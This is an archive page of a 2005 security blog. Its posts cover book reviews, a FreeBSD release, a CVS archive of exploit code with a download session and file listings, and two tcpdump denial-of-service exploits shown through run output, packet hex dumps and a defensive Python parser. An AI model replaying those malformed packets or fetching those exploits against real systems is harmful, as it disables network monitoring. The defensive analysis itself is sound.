Saturday, April 30, 2005

Reviews of VoIP Security, The Internet and Its Protocols Posted

I refused to let April end without finishing and reviewing these two books kindly provided by Elsevier Press. The first was a disappointment. Amazon.com just posted my three star review of VoIP Security. From the review:

"I decided to read VoIP Security because I thought it would describe VoIP protocols and ways to secure them. The table of contents looked very strong and the preface seemed to meet my goals: "For one to truly understand Internet telephony, the reader must have a solid understanding of digital voice, telephony, networking, Internet protocols, and, most important of all, how all of these technologies are put together." Unfortunately, the book is confusing at times and is not an improvement over earlier VoIP security books. So-called 'reviewers' who write that this book 'goes heavily into explaining the low level mechanics of VoIP' reveal they don't read the books they purport to review."

Thankfully, I was very pleased to read the second book Elsevier sent me. Amazon.com just posted my five star review of Adrian Farrel's The Internet and Its Protocols. From the review:

"Adrian Farrel's The Internet and Its Protocols (TIAIP) blew me away. I read this book because it explains the Internet I know, but also how new protocols work with that Internet and make it different from the network I first encountered over a decade ago. Farrel's amusing yet clear writing style delivers a great deal of knowledge in a hefty hardcover. If you want to learn about the protocols that make the Internet work, you need to read TIAIP."

If you want to get a handle on the new protocols appearing in your network, like Multi-Protocol Label Switching (MPLS) or Stream Control Transmission Protocol (SCTP), you should read The Internet and Its Protocols.

FreeBSD 5.4-RC4 Imminent

As I guessed recently, we should see FreeBSD 5.4 RELEASE arrive next week or very soon thereafter. Scott Long posted an update on the release status of 5.4 this morning. He says:

"As you probably noticed, we are a bit behind on the 5.4 release. There was a major stability problem reported several weeks ago in a particular high load, high profile environment, and we decided that it was in everyone's best interest to get it resolved before the release. Well, thanks to the tireless efforts of Doug White and Stephen Uphoff and several others, the bug has been found, fixed, and verified. As soon as it and a few other fixes get merged in, we will start the RC4 build process and hopefully release it for testing late this weekend. After that, unless another show-stopper comes up, we expect to build and release 5.4-RELEASE next weekend."

I hope to test 5.4-RC4 this week, assuming it arrives tomorrow. Thanks FreeBSD release team!

SecurityForest.com ExploitTree

This afternoon I was researching a bot for a chapter in my latest book. I don't spend a lot of time on exploit sites because I am not a penetration tester by trade. I think the last time I really looked at exploits, sites like www.hack.co.za were still around!

While searching for the bot in question, I happened to find SecurityForest.com, although the site was announced on BugTraq in March. SecurityForest.com is an impressive piece of work. The site is essentially a giant CVS archive of attack code, called the ExploitTree. They provide a Client Utility, which at least for UNIX, is an interface to a native CVS client. For Windows, they provide everything you need to access a CVS server.

Here is how a session using the ExploitTree Client Utility appears under UNIX.
./ExploitTree.pl anonymous

ExploitTree Client Utility Manager v0.6
----------------------------------------

1) Initialize (first time download)
2) Update Repository
3) Print Exploit Statistics
q) Quit

> 1
Password is blank (press enter), then wait...

Logging in to :pserver:anonymous@cvs.securityforest.com:2401/home/security/cvsroot
CVS password:
cvs login: warning: failed to open /home/richard/.cvspass for reading:
No such file or directory
cvs server: Updating ExploitTree
U ExploitTree/_SecurityForest
U ExploitTree/_Ver
U ExploitTree/bids.txt
U ExploitTree/exploit_db.txt
U ExploitTree/xsearch.pl
U ExploitTree/xsearch2-beta.pl
cvs server: Updating ExploitTree/application
U ExploitTree/application/_SecurityForest
cvs server: Updating ExploitTree/application/_uncategorized
U ExploitTree/application/_uncategorized/0verkill-exploit.c
U ExploitTree/application/_uncategorized/0x82-GNATS_sux.c
U ExploitTree/application/_uncategorized/0x82-Remote.tannehehe.xpl.c
U ExploitTree/application/_uncategorized/0x82-libCGIfpxpl.c
U ExploitTree/application/_uncategorized/101_shixx.cpp
...edited...
U ExploitTree/system/tru64/TRU64_xkb.pl
U ExploitTree/system/tru64/_SecurityForest
Quiting...

Here's an example of what one finds when the download process is finished.

janney:/home/richard/exploittree/ExploitTree$ ls
CVS bids.txt xsearch.pl
_SecurityForest exploit_db.txt xsearch2-beta.pl
_Ver network
application system
janney:/home/richard/exploittree/ExploitTree$ cd system/
janney:/home/richard/exploittree/ExploitTree/system$ ls
CVS atheos irix novell tru64
_SecurityForest beos linux qnx
_uncategorized bsd mac_osx sco
aix hpux microsoft solaris
janney:/home/richard/exploittree/ExploitTree/system$ cd bsd
janney:/home/richard/exploittree/ExploitTree/system/bsd$ ls
CVS _SecurityForest local remote
janney:/home/richard/exploittree/ExploitTree/system/bsd$ cd remote/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ ls
CVS animal.c freebsd obooptd.c rpc.autofsd.c
_SecurityForest bsdi netbuf.c openbsd stream3.c
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote$ cd freebsd/
janney:/home/richard/exploittree/ExploitTree/system/bsd/remote/freebsd$ ls
CVS fbsd-DoS.c ronin.c
DSR-cfengine.pl fbsd-bnc.c turkey2.c
_SecurityForest ftpspy.c
cURL-remote-FBSD.pl ppp.c

I chose a sparsely populated set of directories. The Microsoft section is much longer.

What's nice about this set-up is that you can synchronize your local copy of the ExploitTree with the SecurityForest.com version using CVS.

Other helpful exploit sites include milw0rm.com and ExploitWatch, which reports on newly available exploits by linking to them.

Friday, April 29, 2005

Cut Budgets If Security Fails to Improve?

I find this note from a recent GovExec story valuable:

"House Government Reform Chairman Tom Davis, R-Va., said Thursday [7 April] that agencies could have their budgets cut if their information technology security does not improve.

With several agencies struggling to meet requirements of the 2002 Federal Information Security Management Act, Davis said that compliance eventually has to be tied to funding."

This will never happen. Does Congress advocate cutting funds to poorly performing schools? Regardless of the merits of the approach, I cannot see enough people supporting this tactic. Agencies will continue to "muddle through" until evidence of a massive intrusion becomes public. I hope that day never arrives, though.

Join Me at USENIX Security 05

You may have noticed the new banner at the top of the Blog showing the 14th USENIX Security Symposium in Baltimore, MD, 31 July - 5 August 2005. I presented a one day NSM tutorial at USENIX Security 04 in San Diego, CA last year, and an improved version of that course at USENIX 05 in Anaheim, CA two weeks ago.

In Baltimore this summer, I will be presenting Network Security Monitoring with Open Source Tools on 31 July, followed by my brand-new Network Incident Response tutorial on 1 August. Descriptions for each class are available via the provided links. I am really looking forward to offering these classes, especially with the MD-DC-VA crowds in attendance. These are both day-long classes.

If you register before 11 July, one day will cost $625 and two days will cost $1200 (for non-students). USENIX offers discounts if five or more people from the same organization attend.

I plan to create a proposal for a network forensics class, and submit it along with my NSM and network IR tutorials for Large Installation System Administration (LISA) conference in December in San Diego, CA. If you would like to see such a class, please contact the training coordinator and let him know!

What's the difference between network IR and network forensics? The network IR class is more about reacting to, containing, and remediating intrusions. It's similar to firefighting. The network forensics class covers collecting, preserving, analyzing, presenting (perhaps to a jury), and defending (under cross-examination) network evidence. The forensics angle concentrates on ensuring your investigation is sound and could support a successful prosecution or human resources action, if necessary.

IR and forensics subjects are often taught from a host-centric perspective, so I believe there is room for network-focused tutorials.

Two More Pre-Reviews

Two new books arrived at TaoSecurity world headquarters this week to be added to my reading queue. The first is Silence on the Wire by Michal Zalewski. This looks like a creative and unconventional look at digital security, although the book's subtitle is "A Field Guide to Passive Reconnaissance and Indirect Attacks." Michal was kind enough to email me to ask if I would review his book. You may recognize Michal for some of his work, like the P0f tool or his really cool TCP sequence number analysis.

The second book is Python Cookbook, 2nd Ed by Alex Martelli, Anna Ravenscroft, and David Ascher. This new edition covers Python 2.3 and 2.4. I consider this book another piece of my Python education program, which I plan to start in the next month or so. This book is helpful because it presents over 300 problems, code solutions, and discussions of those problems. Assuming the code is good, Python programmers will not have to reinvent the wheel if a problem they face is similar to one in the book. I think this sort of "solid code reuse plan" makes a lot of sense.

If you're wondering why you haven't seen any recent book reviews, I'm working my way through the excellent The Internet and Its Protocols by Adrian Farrel. It's an 800 page protocol text, so it's taking a while. I also read everything I review, unlike some of the other reviewers with higher Amazon rankings!

Sources of Free Security Market Research

This morning I was looking for security market research and I came across two useful resources. First, CSO Online provides an Analyst Report section with summaries of research by all of the big name firms. For example, you can read about Symantec Gains Added Vendor Neutrality with New IPS Support by Current Analysis or Deciphering the Dual Meaning of Compliance Monitoring by Forrester. These are not the full articles, but there is enough there to make for interesting reading.

I also found some good press releases on security research from Infonetics Research. These include:

The last article's chart is revealing. It appears in-line "IPS" platforms are set to have a greater revenue share in 2005 than network IDS for the first time. I am not finding this surprising. When I looked this morning to find the "leading" IDS or IPS solutions, I created this list:

What would you add to this list? If you were to take a next-generation course on IDS/IPS and network security monitoring, what products would you want to try, hands-on, in the class?

Thursday, April 28, 2005

Internal Revenue Service Hassling You? Cite Security Issues

I filed my taxes a few weeks ago. Now I read in Techweb and Reuters that the Internal Revenue Service's security is horrible. According to Andy Sullivan of Reuters:

"Security flaws in computer systems used by the Internal Revenue Service expose millions of taxpayers to potential identity theft or illegal police snooping, according to a congressional report released today.

The IRS also is unlikely to know if outsiders are browsing through citizens' tax returns because it doesn't effectively police its computer systems for unauthorized use, the Government Accountability Office found."

Greg Keizer writes even more disturbing findings:

"The GAO, for instance, found that nearly 7,500 mainframe users, which included IRS employees, independent contractors, and non-IRS government employees, all have the ability to access and even change 'sensitive taxpayer' data.

Lack of other security controls and wide-open access privileges mean that the IRS might not even know if an identity breach has occurred, said the GAO."

The Government Accounting Office (GAO) report is available in .pdf form here.

It sounds like the IRS cannot account for the integrity of its data. If that is the case, they cannot be sure if the information entered by an e-Filer is what the taxpayer actually entered. They cannot be sure of anything unless they have a paper record or duplicate, separate electronic record protected by alternate means. I guess it was a good idea for me to submit paper records to the IRS -- as long as they are available for review.

Cyber Incident Detection and Data Analysis Center Goes Public

In October 2003 I reported on the Cyber Incident Detection & Data Analysis Center (CIDDAC), a collaboration of the University of Pennsylvania's Institute of Strategic Threat Analysis and Response (ISTAR) laboratory in Philadelphia, the Philadelphia InfraGard chapter, and Charles "Buck" Fleming, CEO of the apparently dormant AdminForce LLC. Details in 2003 were sparse, but I was skeptical that companies would agree to host "what CIDDAC calls Real-time Cyber Attack Detection Sensors, or RCADS, throughout as many U.S. companies as possible — and eventually the world — and feed incident data to a centrally managed operations facility at the University of Pennsylvania at Philadelphia."

Stories by Infoworld and Computerworld are shedding some light on the situation. First, it does not appear CIDDAC will watch company traffic. Instead, they are just deploying honeypots:

"John Chesson, a special agent at the FBI in Philadelphia, said the RCADS are essentially 'hardened honeypots' that look like they are part of the network an intruder is trying to enter. When the RCADS are attacked, CIDDAC workers monitor the event and collect real-time data that can be forwarded to law enforcement officials, he said."

I found this comparison chart interesting. It allegedly shows how CIDDAC is superior to other data collection methods.

I wonder what metrics CIDDAC used to determine the width of the colored bars for a competing organization, like CERT? It must be a Philly vs. Pittsburgh issue.

Check this out:

"The initial 30 participants, who are anonymous for security reasons, will pay about $10,000 for the installation of the RCADs and for the first year of monitoring and reports.

'We take minutes to analyze what now takes hours,' Fleming said. 'We know it's going to work. We've had prototypes working for years now.'"

According to reporting, CIDDAC is DHS funded:

"The pilot project, which has been in the planning stages for two years, is being funded through a $200,000 grant from the DHS Science and Technology Directorate and with the support of the FBI."

The CIDDAC FAQ offers these details:

"CIDDAC has received its initial funding and construction is underway at our University of Pennsylvania facility. The build-out, setup and testing estimated completion date is no later than October 2005. CIDDAC services will be available by December 2005."

I'll keep my eye on this project. I would be interested in speaking with anyone from CIDDAC who would like the project profiled here. It seems CIDDAC is a honeypot-based managed security services provider that charges $10,000 per year, has start-up funding from DHS, and works with the Philadelphia FBI and U Penn. Am I wrong?

Tcpdump Vulnerabilities

I learned of four vulnerabilities in Tcpdump found by Vade79 by checking the latest exploits at Packet Storm. Linking to the exploits themselves, they are:

xtcpdump-ldp-dos.c: Tcpdump 3.8.3 and below mishandles Multi-Protocol Label Switching (MPLS) Label Distribution Protocol (LDP) packets. The effect is a local denial of service to Tcpdump. No system needs to be listening to port 646 TCP for Tcpdump to be affected.

If you run xtcpdump-ldp-dos, it looks like this to the attacker:

./xtcpdump-ldp-dos 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (LDP) ldp_print() infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] destination : 192.168.1.1
[*] amount : 5

[+] sending(packet = .): .....

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI without the -v switch:

Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
...continues...

If you add the -v switch, you see this:

09:09:02.092665 IP (tos 0x0, ttl 64, id 41668, offset 0,
flags [none], length: 46) 192.168.1.5.52016 > 192.168.1.1.646:
[udp sum ok]
LDP, Label-Space-ID: 255.255.255.255:65535, length: 18
Unknown Message (0x7fff), length: 0, Message ID:
0xffffffff, Flags: [continue processing if unknown]
0x0000: 0402 6ee0 7042 0e6a 0100 4600 0000 4600
0x0010: 0000 1200 0030 4841 f956 00c0 9f3f 4fc5
0x0020: 0800 4500 0038 917f 0000 4001 65ef c0a8
0x0030: 0101 c0a8 0105 0303 2f2c 0000 0000 4500
0x0040: 002e a2c4 0000 4011 54a4 c0a8 0105 c0a8
0x0050: 0101 cb30 0286 001a 0000 6ee0 7042 3b53
0x0060: 0200 3c00 0000 3c00 0000 1200 00c0 9f3f
0x0070: 4fc5 0030 4841 f956 0800 4500 002e a2c5
0x0080: 0000 4011 54a3 c0a8 0105 c0a8 0101 cb31
0x0090: 0286 001a aeaa 0001 ffff ffff ffff ffff
0x00a0: ffff 0000 ffff ffff 1e38 6ee0 7042 4953
0x00b0: 0200 4600 0000 4600 0000 1200 0030 4841
0x00c0: f956 00c0 9f3f 4fc5 0800 4500 0038 9180
0x00d0: 0000 4001 65ee c0a8 0101 c0a8 0105 0303
0x00e0: 2f2b 0000 0000 4500 002e a2c5 0000 4011
0x00f0: 54a3 c0a8 0105 c0a8 0101 cb31 0286 001a
0x0100: 0000 6ee0 7042 783d 0300 3c00 0000 3c00
0x0110: 0000 1200 00c0 9f3f 4fc5 0030 4841 f956
...continues...

Here is how Snort sees the traffic. Only one packet is shown.

04/28-09:07:30.928973 192.168.1.5:52016 -> 192.168.1.1:646
UDP TTL:64 TOS:0x0 ID:41668 IpLen:20 DgmLen:46
Len: 18
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8 ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF ............

Here is sample traffic for you to try: ldp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.
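As an added defender's example (my code, not tcpdump's, Snort's, or the maintainers' patch), this Python parser rebuilds the datagram from the Snort hex dump above and decodes the LDP PDU with explicit bounds checks: it clamps the advertised PDU length (65535) to the 18 bytes actually captured, rejects the zero-length message, and always advances its offset, so a decoder written this way reports the malformation instead of spinning. The Snort dump is constructed inline from the lines shown above; the check names and the 64-message cap are my assumptions, and the 4-byte minimum comes from the LDP message header layout (type, length, message ID).

```python
import re
import struct

# Constructed inline from the Snort hex dump shown above: one Ethernet II /
# IPv4 / UDP datagram carrying the LDP PDU.  Snort's DgmLen:46 means the
# frame is 14 + 46 = 60 bytes.
SNORT_DUMP = """\
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 2E A2 C4 00 00 40 11 54 A4 C0 A8 01 05 C0 A8 ......@.T.......
0x0020: 01 01 CB 30 02 86 00 1A AE AB 00 01 FF FF FF FF ...0............
0x0030: FF FF FF FF FF FF 00 00 FF FF FF FF ............
"""
SNORT_DGM_LEN = 46

HEX_BYTE = re.compile(r"^[0-9A-Fa-f]{2}$")


def snort_dump_to_bytes(dump, frame_len):
    """Rebuild the frame from Snort's 'offset: hex bytes ascii' lines.

    frame_len (14 + DgmLen) says when to stop, so an ASCII column that
    happens to look like a hex pair is never mistaken for data.
    """
    out = bytearray()
    for line in dump.splitlines():
        tokens = line.split()
        if not tokens or not tokens[0].startswith("0x"):
            continue
        for tok in tokens[1:]:
            if len(out) >= frame_len or not HEX_BYTE.match(tok):
                break
            out.append(int(tok, 16))
    if len(out) != frame_len:
        raise ValueError("dump holds %d bytes, expected %d" % (len(out), frame_len))
    return bytes(out)


def udp_payload(frame):
    """Strip Ethernet II, IPv4 (honouring IHL) and UDP; return the payload."""
    if frame[12:14] != b"\x08\x00":
        raise ValueError("not an IPv4 frame")
    ihl = (frame[14] & 0x0F) * 4
    if frame[14 + 9] != 17:
        raise ValueError("not UDP")
    udp = 14 + ihl
    udp_len = struct.unpack("!H", frame[udp + 6:udp + 8])[0]
    return frame[udp + 8:udp + udp_len]


LDP_HDR = struct.Struct("!HHIH")  # version, PDU length, LSR id, label space
MSG_HDR = struct.Struct("!HHI")   # U bit + type, message length, message id
MSG_MIN_LEN = 4                   # length must at least cover the message id


def parse_ldp(payload, max_msgs=64):
    """Parse one LDP PDU into (header, messages, problems).

    Lengths are clamped to what was captured and every iteration advances
    the offset, so a hostile PDU cannot make the loop spin.
    """
    problems = []
    if len(payload) < LDP_HDR.size:
        return None, [], ["truncated PDU header"]
    version, pdu_len, lsr_id, label_space = LDP_HDR.unpack_from(payload)
    lsr = "%d.%d.%d.%d" % tuple(lsr_id.to_bytes(4, "big"))
    header = {"version": version, "pdu_len": pdu_len,
              "label_space_id": "%s:%d" % (lsr, label_space)}
    if version != 1:
        problems.append("unexpected LDP version %d" % version)
    avail = len(payload) - 4           # pdu_len counts bytes after itself
    if pdu_len > avail:
        problems.append("PDU length %d exceeds captured %d" % (pdu_len, avail))
        pdu_len = avail
    end = 4 + pdu_len
    off = LDP_HDR.size
    msgs = []
    while off < end and len(msgs) < max_msgs:
        if end - off < MSG_HDR.size:
            problems.append("%d trailing bytes, too short for a message" % (end - off))
            break
        utype, msg_len, msg_id = MSG_HDR.unpack_from(payload, off)
        msg = {"type": utype & 0x7FFF, "unknown_ok": bool(utype & 0x8000),
               "length": msg_len, "id": msg_id}
        msgs.append(msg)
        if msg_len < MSG_MIN_LEN:
            problems.append("message 0x%04x at offset %d has illegal length %d"
                            % (msg["type"], off, msg_len))
            break
        if off + 4 + msg_len > end:
            problems.append("message at offset %d overruns the PDU" % off)
            break
        off += 4 + msg_len             # strictly increases: no infinite loop
    return header, msgs, problems


def analyze_snort_dump(dump, dgm_len):
    """Convenience wrapper: Snort hex dump -> parsed LDP PDU."""
    return parse_ldp(udp_payload(snort_dump_to_bytes(dump, 14 + dgm_len)))


if __name__ == "__main__":
    hdr, msgs, problems = analyze_snort_dump(SNORT_DUMP, SNORT_DGM_LEN)
    print(hdr, msgs, problems)
```

On the packet above it reports the same Label-Space-ID and Unknown Message (0x7fff) that tcpdump -v printed, plus two problems: the PDU length exceeding the capture and the zero-length message.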

xtcpdump-bgp-dos.c: Tcpdump 3.8.3 and below mishandles Border Gateway Protocol (BGP) packets. The effect is a local denial of service to Tcpdump. A system watched by Tcpdump needs to be listening on port 179 TCP for Tcpdump to be affected. I simulated this by having Netcat listen on port 179 TCP.

If you run xtcpdump-bgp-dos.c, it looks like this to the attacker:

./xtcpdump-bgp-dos.c 192.168.1.1 nospoof
[*] tcpdump[3.8.x]: (BGP) RT_ROUTING_INFO infinite loop DOS.
[*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo)

[*] target: 192.168.1.1
[*] attempting to connect...
[*] successfully connected.
[*] sending malformed BGP data. (34 bytes)
[*] closing connection.

[*] done.

Here is how Tcpdump handles it, if you're running Tcpdump "live" on the CLI:

tcpdump -n -i em1 -s 1515 -v

tcpdump: listening on em1, link-type EN10MB (Ethernet), capture size 1515 bytes
09:04:48.530004 IP (tos 0x0, ttl 64, id 37797, offset 0,
flags [DF], length: 60) 192.168.1.5.57471 > 192.168.1.1.179:
S [tcp sum ok] 2061108147:2061108147(0) win 65535
09:04:48.530039 IP (tos 0x0, ttl 64, id 30686, offset 0,
flags [DF], length: 60) 192.168.1.1.179 > 192.168.1.5.57471:
S [bad tcp cksum 8385 (->b9d4)!] 2753925437:2753925437(0)
ack 2061108148 win 65535 timestamp 207951117 145837700>

09:04:48.530250 IP (tos 0x0, ttl 64, id 37798, offset 0,
flags [DF], length: 52) 192.168.1.5.57471 > 192.168.1.1.179:
. [tcp sum ok] ack 1 win 33304 145837700 207951117>

09:04:49.031589 IP (tos 0x0, ttl 64, id 37800, offset 0,
flags [DF], length: 87) 192.168.1.5.57471 > 192.168.1.1.179:
P [tcp sum ok] 1:36(35) ack 1 win 33304 145837751 207951117>: BGP, length: 35
Update Message (2), length: 19
Withdrawn routes: 1 bytes
Multi-Protocol Reach NLRI (14), length: 255,
Flags [OTPE+f]:
AFI: IPv4 (1), vendor specific SAFI: Route Target
Routing Information (132), no SNPA
(illegal prefix length)
(illegal prefix length)
...continues...

Here is how Snort sees the traffic. Although the entire session is shown, the fourth packet is the killer.

04/28-09:03:17.383320 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37797 IpLen:20 DgmLen:60 DF
******S* Seq: 0x7ADA03B3 Ack: 0x0 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 145837700 0
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 3C 93 A5 40 00 40 06 23 C0 C0 A8 01 05 C0 A8 .<..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B3 00 00 00 00 A0 02 ......z.........
0x0030: FF FF 10 BB 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 08 B1 4E 84 00 00 00 00 ....N.....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383581 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30686 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0xA425913D Ack: 0x7ADA03B4 Win: 0xFFFF TcpLen: 40
TCP Options (6) => MSS: 1460 NOP WS: 1 NOP NOP TS: 207951117 145837700
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 3C 77 DE 40 00 40 06 3F 87 C0 A8 01 01 C0 A8 .<w.@.@.?.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3D 7A DA 03 B4 A0 12 .......%.=z.....
0x0030: FF FF B9 D4 00 00 02 04 05 B4 01 03 03 01 01 01 ................
0x0040: 08 0A 0C 65 15 0D 08 B1 4E 84 ...e....N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.383646 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37798 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837700 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 93 A6 40 00 40 06 23 C7 C0 A8 01 05 C0 A8 .4..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 10 ......z....%.>..
0x0030: 82 18 63 81 00 00 01 01 08 0A 08 B1 4E 84 0C 65 ..c.........N..e
0x0040: 15 0D ..

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.884950 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:37800 IpLen:20 DgmLen:87 DF
***AP*** Seq: 0x7ADA03B4 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837751 207951117
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 57 93 A8 40 00 40 06 23 A2 C0 A8 01 05 C0 A8 .W..@.@.#.......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 B4 A4 25 91 3E 80 18 ......z....%.>..
0x0030: 82 18 DC FF 00 00 01 01 08 0A 08 B1 4E B7 0C 65 ............N..e
0x0040: 15 0D FF FF FF FF FF FF FF FF FF FF FF FF FF FF ................
0x0050: FF FF 00 13 02 00 01 00 FF 00 FF 0E 00 FF 00 01 ................
0x0060: 84 00 00 00 00 .....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:17.984345 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:30793 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D7 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951178 145837751
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 78 49 40 00 40 06 3F 24 C0 A8 01 01 C0 A8 .4xI@.@.?$......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D7 80 10 .......%.>z.....
0x0030: 82 18 62 EE 00 00 01 01 08 0A 0C 65 15 4A 08 B1 ..b........e.J..
0x0040: 4E B7 N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396501 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38045 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x7ADA03D7 Ack: 0xA425913E Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951178
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9D 40 00 40 06 22 D0 C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D7 A4 25 91 3E 80 11 ......z....%.>..
0x0030: 82 18 62 BA 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 4A .J

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396841 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31075 IpLen:20 DgmLen:52 DF
***A**** Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 63 40 00 40 06 3E 0A C0 A8 01 01 C0 A8 .4yc@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 10 .......%.>z.....
0x0030: 82 18 62 91 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396856 192.168.1.1:179 -> 192.168.1.5:57471
TCP TTL:64 TOS:0x0 ID:31076 IpLen:20 DgmLen:52 DF
***A***F Seq: 0xA425913E Ack: 0x7ADA03D8 Win: 0x8218 TcpLen: 32
TCP Options (3) => NOP NOP TS: 207951219 145837802
0x0000: 00 30 48 41 F9 56 00 C0 9F 3F 4F C5 08 00 45 00 .0HA.V...?O...E.
0x0010: 00 34 79 64 40 00 40 06 3E 09 C0 A8 01 01 C0 A8 .4yd@.@.>.......
0x0020: 01 05 00 B3 E0 7F A4 25 91 3E 7A DA 03 D8 80 11 .......%.>z.....
0x0030: 82 18 62 90 00 00 01 01 08 0A 0C 65 15 73 08 B1 ..b........e.s..
0x0040: 4E EA N.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

04/28-09:03:18.396922 192.168.1.5:57471 -> 192.168.1.1:179
TCP TTL:64 TOS:0x0 ID:38046 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x7ADA03D8 Ack: 0xA425913F Win: 0x8217 TcpLen: 32
TCP Options (3) => NOP NOP TS: 145837802 207951219
0x0000: 00 C0 9F 3F 4F C5 00 30 48 41 F9 56 08 00 45 00 ...?O..0HA.V..E.
0x0010: 00 34 94 9E 40 00 40 06 22 CF C0 A8 01 05 C0 A8 .4..@.@.".......
0x0020: 01 01 E0 7F 00 B3 7A DA 03 D8 A4 25 91 3F 80 10 ......z....%.?..
0x0030: 82 17 62 91 00 00 01 01 08 0A 08 B1 4E EA 0C 65 ..b.........N..e
0x0040: 15 73 .s

Here is sample traffic for you to try: bgp-dos.taosecurity.lpc. You should be able to run this through Tcpdump using the -r option without killing Tcpdump.

Vade79 also released exploits titled xtcpdump-isis-dos.c and xtcpdump+ethr-rsvp-dos.c, for Intermediate System to Intermediate System (IS-IS) and Resource ReSerVation setup Protocol (RSVP), respectively.

While I could get all four exploits to compile on FreeBSD, I could not get these last two to generate traffic. I believe the problem lies with the spoofing mechanism in each exploit. I was only able to get the first two exploits to work when I enabled the "nospoof" options.

Keep an eye on Tcpdump.org and the tcpdump-workers mailing list for developments. The latest tcpdump-current.tar.gz or CVS check-outs should be patched. I also expect to see a Tcpdump 3.9.0 official release patched against these problems next week.

Wednesday, April 27, 2005

Payment Card Industry Security Guidelines

